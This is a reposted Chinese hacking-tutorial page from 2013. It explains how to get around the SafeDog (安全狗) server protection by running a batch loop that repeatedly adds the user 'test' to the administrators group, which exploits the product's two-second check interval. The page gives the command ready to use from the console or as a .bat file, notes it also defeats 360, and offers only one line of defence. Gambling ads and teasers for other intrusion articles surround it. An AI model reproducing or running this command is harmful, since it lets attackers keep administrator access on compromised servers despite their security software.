??斗地主捕鱼电竞提现秒到 广告位招租 - 15元/月全站展示
??支付宝搜索579087183领大额红包 ??伍彩集团官网直营彩票
??好待遇→招代理 ??伍彩集团官网直营彩票
??络茄网 广告位招租 - 15元/月全站展示
安全狗下添加用户的另一方法(大量操作实现突破)

转载   佚名   2013-09-01   浏览量:602


前几天发现的,略无语,因为简单到。。

直接在命令行下使用

for /l %i in (1,1,1000) do @net user test test /add&@net localgroup administrators test /add 

另存为 ad.bat 使用

for /l %%i in (1,1,1000) do @net user test test /add&@net localgroup administrators test /add 

命令的意思是循环一千次执行do后面的命令add user

1.jpg

2.jpg

要说一下安全狗拦截添加用户的原理

安全狗的拦截并不是真正意义上的拦截,而是每2秒钟检测一次是否有新添加的用户,如果有新用户,则删除。

所以我们直接net user test test /add 是能够成功添加用户的,只不过两秒后被安全狗删除了而已。

上面的命令是不断的重复加用户的操作,直到1000次,大概两分钟就会执行完毕自动退出{远程登录test后,无论test是否已经被删除,都不会受到影响},如果需要无限循环,将括号内的数字改为(1,0,1)即可,然后记得要手动停止

3.jpg

每两秒检测一次

更无语的是,如果安全狗和360同时存在,那么360的拦截添加用户的功能将变得无效
直接使用上面那个命令即可

防范:安全钩+mcafee同时控制,基本上不会出现这个问题。

转载自://www.jb51.net/hack/101410.html

招聘 不方便扫码就复制添加关注:程序员招聘谷,微信号:jobs1024


上一篇:
没有了

Serv-U FTP Jail Break(越权遍历目录、下载任意文件)
Serv-U 越权遍历目录、下载任意文件,通过构造..:/来遍历服务器目录,下载任意文件
饶过Xplog70.dll玩入侵(参考防范)
深夜了,好友“如影随行”突然发来消息,说他一台配置非常好的3389肉鸡飞了。以前他是从WEB页面注入入手,然后直接用Xp_cmdshell添加系统用户搞定的,可晚上用3389登陆时突然发现添加的用户不在了,安装的后门都被清理干净,连Xp_cmdshell也执行不了。
九种突破IDS入侵检测系统的实用方法
入侵检测系统,英文简写为IDS,顾名思义,它是用来实时检测攻击行为以及报告攻击的。如果把防火墙比作守卫网络大门的门卫的话,那么入侵检测系统(IDS)就是可以主动寻找罪犯的巡警。
防止黑客入侵系统建立很难发现的隐藏帐户
一般用户很难发现系统中隐藏账户的存在,那么该怎么办呢?其实我们可以通过以下几点来解决这个问题,接下来教你如何把隐藏账户彻底请出系统,感兴趣的朋友不要错过
黑客总结的实用的网站渗透步骤
本文是黑客们总结的比较实用的网站渗透的一些步骤
分享内网渗透域的经验积累
本来是在写一份详细的渗透过程,不过因为一直工作,很多细节没有办法当场记录,所以,暂时在BLOG上写一些能想到的,后面如果有时间有环境,会再补充更多的细节以及图片和在渗透时所遇到的麻烦,如何解决等写出来
本人网站一次被黑的经历与反思 心得与体会
网站会被黑了.现在想想.有哪些方面的经验给大家借鉴一下
服务器建立超级隐藏账号方法
当黑客入侵一台主机后,会想方设法?;ぷ约旱摹袄投晒?,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。
3389无法连接的5种原因分析
3389无法连接的5种原因分析,碰到这类问题的朋友可以参考下面的原因。
SC.exe在渗透中的妙用
sc为微软自带的一个服务管理工具,不过我们一般却很少用到,这里我们只提取出几个特殊的用法,以便我们在做Web安全测试中获取所需信息。